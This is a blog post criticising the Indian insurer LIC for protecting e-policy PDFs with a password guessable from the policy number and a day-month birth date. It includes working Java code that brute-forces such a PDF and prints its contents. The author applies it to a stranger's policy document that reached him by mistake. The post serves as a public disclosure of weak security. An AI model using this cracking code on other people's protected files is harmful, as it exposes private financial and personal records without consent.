by Nirupam Biswas

LIC what were you thinking? Cracking LIC e-Policy doc password!

Long long ago I created a Gmail account for my (now) late grandfather. It seems someone else who shares the same name as my grandfather has provided and continues to provide that email as his own. Over the years I have been receiving random emails addressed to that person. I can tell they are not addressed to my grandfather since the contents in no way relate to my grandfather and he has been dead for a long time. I still have access to that email, so it very possible that the other person is some old fellow who does not quite understand emails.

Anyway fast forward to today. I received mail from LIC for the purchase of e-policy; addressed to that person. Below is the screenshot of that email.

Email screenshot with sensitive infos redacted

The email has two attachments. The second is general terms and condition but the first one is actual policy document. It is password protected. Which is a joke and the whole point for this post.

The section in red box are the rules for the password. The password is the policy number followed by date of birth in DDMM format (note no year is needed). The nine-digit policy number is provided in clear in the subject of the email and also in the names of the two attachments! The remaining part is just figuring out DDMM. That is it!

I then wrote the following Java code.

import com.lowagie.text.exceptions.BadPasswordException;
import com.lowagie.text.pdf.PdfReader;
import com.lowagie.text.pdf.parser.PdfTextExtractor;

import java.io.IOException;

public class Main {
    static final String READ_PDF = "/Path/to_password_protected_policy_doc.pdf";

    public static void main(String[] args) {
        PdfReader pdfreader = null;
        int m = 1;
        int d = 1;
        while (m <= 12) {
            String password = "<policy number here>";
            if (d < 10) {
                password += "0" + d;
            } else {
                password += d;
            }
            if (m < 10) {
                password += "0" + m;
            } else {
                password += m;
            }
            try {
                pdfreader = new PdfReader(READ_PDF, password.getBytes());
                
                // get pages in PDF - Not really needed
                int pages = pdfreader.getNumberOfPages();
                PdfTextExtractor pdfTextExtractor = new PdfTextExtractor(pdfreader);
                // Iterate through pages to read content
                for (int i = 1; i <= pages; i++) {
                    // Extract content of each page
                    String contentOfPage = pdfTextExtractor.getTextFromPage(i, true);
                    System.out.println(contentOfPage);
                }

                System.out.println("THE PASSWORD IS: " + password);
                break;
            } catch (BadPasswordException bp) {
                System.err.println("bad password: " + password);
            } catch (IOException e) {
                e.printStackTrace();
                break;
            } finally {
                if (pdfreader != null) {
                    pdfreader.close();
                }
            }
            if (d >= 31) {
                d = 1;
                m++;
            } else {
                d++;
            }
        }
    }
}

In the code above I did not even bother to check if the month really has 30 or 28 days. That really does not matter since invalid combinations will not yield a valid password. So it just wastes some time.

However, it took few milli seconds to get the right password. LIC get your acts together. This is sad. Such a large organisation with such a weak security posture is alarming.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.